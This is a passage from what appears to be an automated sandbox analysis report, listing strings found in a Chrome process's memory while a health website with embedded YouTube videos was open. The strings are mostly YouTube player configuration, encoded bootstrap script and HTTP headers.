[];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true}riginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2352259272.000028EC04CC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2323201812.000028EC04CAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2329710109.000028EC0418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 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
                                  Source: chrome.exe, 00000000.00000002.2496886639.000028EC04A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HRpgw3pr2zx+zbfu3OWBb9XAtv9LdoBbGVGm+zuRWG0wfuaDwOM2rYHCpZ+VSLQiZ9D5bX3p2VMrnbgVKEoWkTWrk8fyZTrHYPBRUU8EDhy8lenDZgCZtDSJGoEBdAEFxDOYT7W0Cw2AR6H02PyDCsZ2VFnceeJ0fFcF5Hoj/QMQlrN27uj7H5QHmTsInWJHfccNk2UVK6ETXqx+fdfNSxrnavEgpatDDx1vMATx0pCTzdHAItQFwoJ4cX94Z1prk0k+HpyVm3aW08aZW+VdqhNN+vsWzPCPAZZiE+fIi5eBDITLPIqrb9t1Md7ubrDqYycWRQQEmUF3jfcGwlMekRkl4Nkl85RqJee2muJQiwEIH+CDK+CzCQ2lrnDQ+hqUEluKLkhMz/7hXiIJOEgIHJQr1dxUIlz91kJWh4Iul7davpjQd6IIt3Mnp2hR0rWDz8+ZWTQCQ13U1oC65XnbDZTswiB8vjvmkYT+8HoP9rS6/mSXC7IXx91zlvVDeDh5/4tPIhtV6Q82PUl0Fyip2ILK+/PPoDVwBOpchDpnju0DW2PsnB4LisW1WEZ7b9F7/ksGBLPhmHhXSvuEQsRLqA92KUS2+r0geo8whVNHZ+EX8kf7Art9UMoe80ec0yf0NprcvqXdzoDGw1Gzeg1YtYNHX3xcxZbamGgk5xOFGc6Qex03G7MvVG8jYjbrGBHp1x9oGHnpiTMFGBfIhxTopUNS2KcQ/8xpnypBymD/H0WS8s8jn8o0X35mivo8vtDTA95pr1nv3cNo78wP5ZSptCaYgADoG6o6h5Vwet6Pd/5nX/rH6XQg6m+h/O4unCB2pXHaxwj04cNjXCdcov4MMzMH7RgKKLn6ioKjztll35sUSyQaCW0hCYwgcFP1reCIB8x+p02ZSk66Kgk9yTZHb+SjgrPBwBSvp6O9TW0fhwfHHFu6ne6tKeE35QZfw0/Qsh8JNEBQZ9e9U7523ZknUEXDNab3atftuqwYudixqH6wUBDo1vTzxubK2wG+wvSldRddbcyoxLd651Sut6692sQsO6Ym59DVJG42S23BSF0sLYGKXMRsRc9rq9wpAmLb9P/k//ZBTB6Qd0plKhs3fekACyDEcikLaY9reD3c6DzT6L7O8FKTmNcxGhJ/9En4y6dRVdXUZw2JiFSikE9ruEQblbsveqBkNkLbh9/zKVTS6S7qy3CyNDSwvG8gkUoVn9Lfde0RhqMelaURaTIe0l9U4AP6SUWS4a4fUoL1sDcTd/OZbyGA\\u003d\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200access-control-allow-origin:https://www.youtube.comcross-origin-resource-policy:cross-originaccess-control-allow-credentials:trueaccess-control-allow-headers:X-Playlog-Webcontent-type:text/plain; charset=UTF-8content-encoding:gzipdate:Thu, 22 May 2025 15:06:35 GMTserver:Playlogcontent-length:131x-xss-protection:0x-frame-options:SAMEORIGINalt-svc:h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: HTTP/1.1 200access-control-allow-origin:https://www.youtube.comcross-origin-resource-policy:cross-originaccess-control-allow-credentials:trueaccess-control-allow-headers:X-Playlog-Webp3p:CP="This is not a P3P policy! See g.co/p3phelp for more info."content-type:text/plain; charset=UTF-8content-encoding:gzipdate:Thu, 22 May 2025 15:06:33 GMTserver:Playlogcontent-length:131x-xss-protection:0x-frame-options:SAMEORIGINalt-svc:h3=":443"; ma=2592000,h3-29=":443"; ma=2592000expires:Thu, 22 May 2025 15:06:33 GMTcache-control:private equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2360620898.000028EC06804000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Hk5dXBybjU5N0VsSUx1M1h5aERPV3NlMjNJTmlnRzhPSmtVbUZqUlc1aHpyQVdldjdDbTRKc0xwSER5TXNDOWYwWGVqamFXYjJtVENXblltbEl0WmswQjNTenZXaVZNdVl1VzcwdEhFZmtISk9vWW5OekRIQU8rMExkN0JtaEFZVFdTbm5RYVJ2cjF0RVQ2YU1XOXJyN2l2ZzVWQmx1ZzMrUXI4ZUsrRkd2b3JQQTlBT09NKytDK0hsald6OUVsWVEzOXBTQjYwWVkzYUNqK2l3VTU5b0tMSFMweWRPWU5nVmd6T2svNjU1ZWJoeVV6dVlTRlU1dHRiQkc0Q1dTN2F6YTRjVFdhNGJtMDBUR3hOUEY4Ui8xNWVrWVdqOHFYMW1jQWxyZW9FK1pTbmJOUjg4N0JzREJwb3pUeERMNUNkcm9iWko5elRPUGsvQlJ3SldWSmNvRTlXbElwRjdNa0FRa2w5aWlxTmtyN3FYY2dYVVhXZGV6L2oxRENCNGRrdUZLOE1tb2xCVlhHVkJ5VjUxN1RsNW1GUmx5NTIvVEdaRHpsaWllY2JBdm1GalBrYmNOa2duNGxScjZqSFMvMGdIR1RrbzdPYjJ3akc2MFY5Lzd0QklXaGRHNDdQQlZVMmxhRDhSSVRuSTM5U2o1eWd0eXA2dDBNQk41aUFzc1R2STVHODdJZFhHaG5QVEFDU21QbU9YbVYydklYdTgrWlVEYlRzSXk2U0c0SDR4NjVLT3pDREFYeXRvNmV2VVJtcFpWV0N5S3V6TGU4VEI0M0ZnS0hVdWIxclA0aHVrd1Z3endDVDE1NzRCNmUvTFljeHVvaXZmekt0c2hzUTZ6YktINy9JbGZ1S3U3Q1E2bmVYWUN1YXh1UEFvSm9rUWN5SXZpc0NCdmp1a2FpeXlWc0ZOczR1c2JKMnIvZXl5TkpXQWo5VzdiQittcFg0cVFhTmtzcURMZUpRNUZGRmU5ZnFlK0xWQW94UWlXVFN0UjVnYzlFSlFsV0JvODRVbWY5VWkzbWF4TGoyVjdzTHB5bGM5Zmh5NmlmazhJbXdsUnZjRXVneDJhZVZXdmFsMnB5Ty9OYnlMazA4YUJDbUxsSjFhWGdEYWhqM3JnS1hQQmI1UE9vL0tMU25xN3IxV3ZPZ1FHbkcwblBQWTlGemh3R3JBXHUwMDNkXCIsXCJpbnRlcnByZXRlclNhZmVVcmxcIjp7XCJwcml2YXRlRG9Ob3RBY2Nlc3NPckVsc2VUcnVzdGVkUmVzb3VyY2VVcmxXcmFwcGVkVmFsdWVcIjpcIi8vd3d3Lmdvb2dsZS5jb20vanMvdGgvdjE1UUNqbTZXTzNRRXM4MGNoRzhRZlMxSGxGckRvV0JMbFN2eHNwa2l1QS5qc1wifSxcInNlcnZlckVudmlyb25tZW50XCI6MX19fSxcInZpZGVvRmxhZ3NcIjp7XCJwbGF5YWJsZUluRW1iZWRcIjp0cnVlLFwiaXNDcmF3bGFibGVcIjp0cnVlfSxcInByZXZpZXdQbGF5YWJpbGl0eVN0YXR1c1wiOntcInN0YXR1c1wiOlwiT0tcIixcInBsYXlhYmxlSW5FbWJlZFwiOnRydWUsXCJjb250ZXh0UGFyYW1zXCI6XCJRMEZGVTBGblowRVx1MDAzZFwifSxcImVtYmVkZGVkUGxheWVyTW9kZVwiOlwiRU1CRURERURfUExBWUVSX01PREVfREVGQVVMVFwiLFwiZW1iZWRkZWRQbGF5ZXJDb25maWdcIjp7XCJlbWJlZGRlZFBsYXllck1vZGVcIjpcIkVNQkVEREVEX1BMQVlFUl9NT0RFX0RFRkFVTFRcIixcImVtYmVkZGVkUGxheWVyRmxhZ3NcIjp7fX0sXCJlbWJlZGRlZFBsYXllckNvbnRleHRcIjp7XCJlbWJlZGRlZFBsYXllckVuY3J5cHRlZENvbnRleHRcIjpcIkFENVp6RlNfV2Zmc0liRXVsMENFaGdMRU1WUkRGU3N2YnpWWm9WbEdsSG55aDdac2Q1RFZnNmhobG5vVUFMcXNKSFMybnpUdkxjVEotZTlXRW8yUldnVFFZZUFmZ2hwX3hhWDk1dVJEQzNCQzY2ZGdCeUF6Y2lmM3ZzRks3WGRCZkVjZlwiLFwiYW5jZXN0b3JPcmlnaW5zU3VwcG9ydGVkXCI6ZmFsc2V9fSIsInZpZGVvX2lkIjoiRlVSaTVhSGdwMWcifSwiUE9TVF9NRVNTQUdFX09SSUdJTiI6IioiLCJWSURFT19JRCI6IkZVUmk1YUhncDFnIiwiRE9NQUlOX0FETUlOX1NUQVRFIjoiIn0pO3dpbmRvdy55dGNmZy5vYmZ1c2NhdGVkRGF0YV8gPSBbXTs=","url":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2302249757.000028EC04D44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Hl0Y3NpPXtndDpmdW5jdGlvbihuKXtuPShufHwiIikrImRhdGFfIjtyZXR1cm4geXRjc2lbbl18fCh5dGNzaVtuXT17dGljazp7fSxpbmZvOnt9LGdlbDp7cHJlTG9nZ2VkR2VsSW5mb3M6W119fSl9LG5vdzp3aW5kb3cucGVyZm9ybWFuY2UmJndpbmRvdy5wZXJmb3JtYW5jZS50aW1pbmcmJndpbmRvdy5wZXJmb3JtYW5jZS5ub3cmJndpbmRvdy5wZXJmb3JtYW5jZS50aW1pbmcubmF2aWdhdGlvblN0YXJ0P2Z1bmN0aW9uKCl7cmV0dXJuIHdpbmRvdy5wZXJmb3JtYW5jZS50aW1pbmcubmF2aWdhdGlvblN0YXJ0K3dpbmRvdy5wZXJmb3JtYW5jZS5ub3coKX06ZnVuY3Rpb24oKXtyZXR1cm4obmV3IERhdGUpLmdldFRpbWUoKX0sdGljazpmdW5jdGlvbihsLHQsbil7dmFyIHRpY2tzPXl0Y3NpLmd0KG4pLnRpY2s7dmFyIHY9dHx8eXRjc2kubm93KCk7aWYodGlja3NbbF0pe3RpY2tzWyJfIitsXT10aWNrc1siXyIrbF18fFt0aWNrc1tsXV07dGlja3NbIl8iK2xdLnB1c2godil9dGlja3NbbF09CnZ9LGluZm86ZnVuY3Rpb24oayx2LG4pe3l0Y3NpLmd0KG4pLmluZm9ba109dn0saW5mb0dlbDpmdW5jdGlvbihwLG4pe3l0Y3NpLmd0KG4pLmdlbC5wcmVMb2dnZWRHZWxJbmZvcy5wdXNoKHApfSxzZXRTdGFydDpmdW5jdGlvbih0LG4pe3l0Y3NpLnRpY2soIl9zdGFydCIsdCxuKX19OwooZnVuY3Rpb24odyxkKXtmdW5jdGlvbiBpc0dlY2tvKCl7aWYoIXcubmF2aWdhdG9yKXJldHVybiBmYWxzZTt0cnl7aWYody5uYXZpZ2F0b3IudXNlckFnZW50RGF0YSYmdy5uYXZpZ2F0b3IudXNlckFnZW50RGF0YS5icmFuZHMmJncubmF2aWdhdG9yLnVzZXJBZ2VudERhdGEuYnJhbmRzLmxlbmd0aCl7dmFyIGJyYW5kcz13Lm5hdmlnYXRvci51c2VyQWdlbnREYXRhLmJyYW5kczt2YXIgaT0wO2Zvcig7aTxicmFuZHMubGVuZ3RoO2krKylpZihicmFuZHNbaV0mJmJyYW5kc1tpXS5icmFuZD09PSJGaXJlZm94IilyZXR1cm4gdHJ1ZTtyZXR1cm4gZmFsc2V9fWNhdGNoKGUpe3NldFRpbWVvdXQoZnVuY3Rpb24oKXt0aHJvdyBlO30pfWlmKCF3Lm5hdmlnYXRvci51c2VyQWdlbnQpcmV0dXJuIGZhbHNlO3ZhciB1YT13Lm5hdmlnYXRvci51c2VyQWdlbnQ7cmV0dXJuIHVhLmluZGV4T2YoIkdlY2tvIik+MCYmdWEudG9Mb3dlckNhc2UoKS5pbmRleE9mKCJ3ZWJraXQiKTwwJiZ1YS5pbmRleE9mKCJFZGdlIik8CjAmJnVhLmluZGV4T2YoIlRyaWRlbnQiKTwwJiZ1YS5pbmRleE9mKCJNU0lFIik8MH15dGNzaS5zZXRTdGFydCh3LnBlcmZvcm1hbmNlP3cucGVyZm9ybWFuY2UudGltaW5nLnJlc3BvbnNlU3RhcnQ6bnVsbCk7dmFyIGlzUHJlcmVuZGVyPShkLnZpc2liaWxpdHlTdGF0ZXx8ZC53ZWJraXRWaXNpYmlsaXR5U3RhdGUpPT0icHJlcmVuZGVyIjt2YXIgdk5hbWU9IWQudmlzaWJpbGl0eVN0YXRlJiZkLndlYmtpdFZpc2liaWxpdHlTdGF0ZT8id2Via2l0dmlzaWJpbGl0eWNoYW5nZSI6InZpc2liaWxpdHljaGFuZ2UiO2lmKGlzUHJlcmVuZGVyKXt2YXIgc3RhcnRUaWNrPWZ1bmN0aW9uKCl7eXRjc2kuc2V0U3RhcnQoKTtkLnJlbW92ZUV2ZW50TGlzdGVuZXIodk5hbWUsc3RhcnRUaWNrKX07ZC5hZGRFdmVudExpc3RlbmVyKHZOYW1lLHN0YXJ0VGljayxmYWxzZSl9aWYoZC5hZGRFdmVudExpc3RlbmVyKWQuYWRkRXZlbnRMaXN0ZW5lcih2TmFtZSxmdW5jdGlvbigpe3l0Y3NpLnRpY2soInZjIil9LApmYWxzZSk7aWYoaXNHZWNrbygpKXt2YXIgaXNIaWRkZW49KGQudmlzaWJpbGl0eVN0YXRlfHxkLndlYmtpdFZpc2liaWxpdHlTdGF0ZSk9PSJoaWRkZW4iO2lmKGlzSGlkZGVuKXl0Y3NpLnRpY2soInZjIil9dmFyIHNsdD1mdW5jdGlvbihlbCx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7dmFyIG49eXRjc2kubm93KCk7ZWwubG9hZFRpbWU9bjtpZihlbC5zbHQpZWwuc2x0KCl9LHQpfTt3Ll9feXRSSUw9ZnVuY3Rpb24oZWwpe2lmKCFlbC5nZXRBdHRyaWJ1dGUoImRhdGEtdGh1bWIiKSlpZih3LnJlcXVlc3RBbmltYXRpb25GcmFtZSl3LnJlcXVlc3RBbmltYXRpb25GcmFtZShmdW5jdGlvbigpe3NsdChlbCwwKX0pO2Vsc2Ugc2x0KGVsLDE2KX19KSh3aW5kb3csZG9jdW1lbnQpOwo=","url":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","taburl":"https://fountainofhealth.ca/en","IsInline":false,"Dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: I_keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2332503048.000028EC04B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.jsaDb equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2369897325.000028EC07F03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: MCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/FURi5aHgp1g?si\\u003dY2rCuE23jf8bkHaX\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGENPhrwUQgc3OHBDxnLAFEJmYsQUQ9v7_EhD-ns8cELCJzxwQuOTOHBDqo88cENeczxwQ5qDPHBCChLgiEJr0zhwQ37jOHBC-irAFEImEuCIQk4bPHBDcos8cEIiHsAUQvbauBRDk5_8SEODg_xIQpp3PHBDJ968FEPDizhwQr4__EhDhns8cELnZzhwQzInPHBCcm88cEPyyzhwQ_ZzPHBC36v4SEParsAUQvZmwBRDah4ATEN68zhwQi4KAExDdls8cELvZzhwQntCwBRCJsM4cEOugzxwQh6zOHBCI468FEMnmsAUQlP6wBRCZjbEFEOvo_hIQ7qDPHBD-8_8SEMzfrgUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNalUyTlRNM05qSTNNQT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiLvvOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI+a7znK23jQMVJnlMCB2AoyiC\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{\"brand\":\"\",\"model\":\"\",\"browser\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"os\":\"Windows\",\"osVersion\":\"10.0\",\"platform\":\"DESKTOP\",\"interfaceName\":\"WEB_EMBEDDED_PLAYER\",\"interfaceVersion\":\"1.20250519.22.00\"},\"serializedExperimentIds\":\"24004644,24439361,24499532,24566687,
                                  Source: chrome.exe, 00000000.00000003.2364902944.000028EC07FB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: MCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/gobWGqPjLSQ?si\\u003dE-htCYBt9m3YW0ws\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGELnZzhwQ7aDPHBC9mbAFEN68zhwQ66DPHBDmoM8cEIiHsAUQpp3PHBCJsM4cEOvo_hIQr4__EhDk5_8SENyizxwQ9quwBRDdls8cEJmYsQUQ37jOHBDxnLAFEP2czxwQvoqwBRCHrM4cEIjjrwUQ4Z7PHBD-ns8cEODg_xIQiIS4IhCThs8cEIHNzhwQ2oeAExCa9M4cEJybzxwQmY2xBRCe0LAFEPyyzhwQvbauBRCLgoATEMzfrgUQ0-GvBRD-8_8SELvZzhw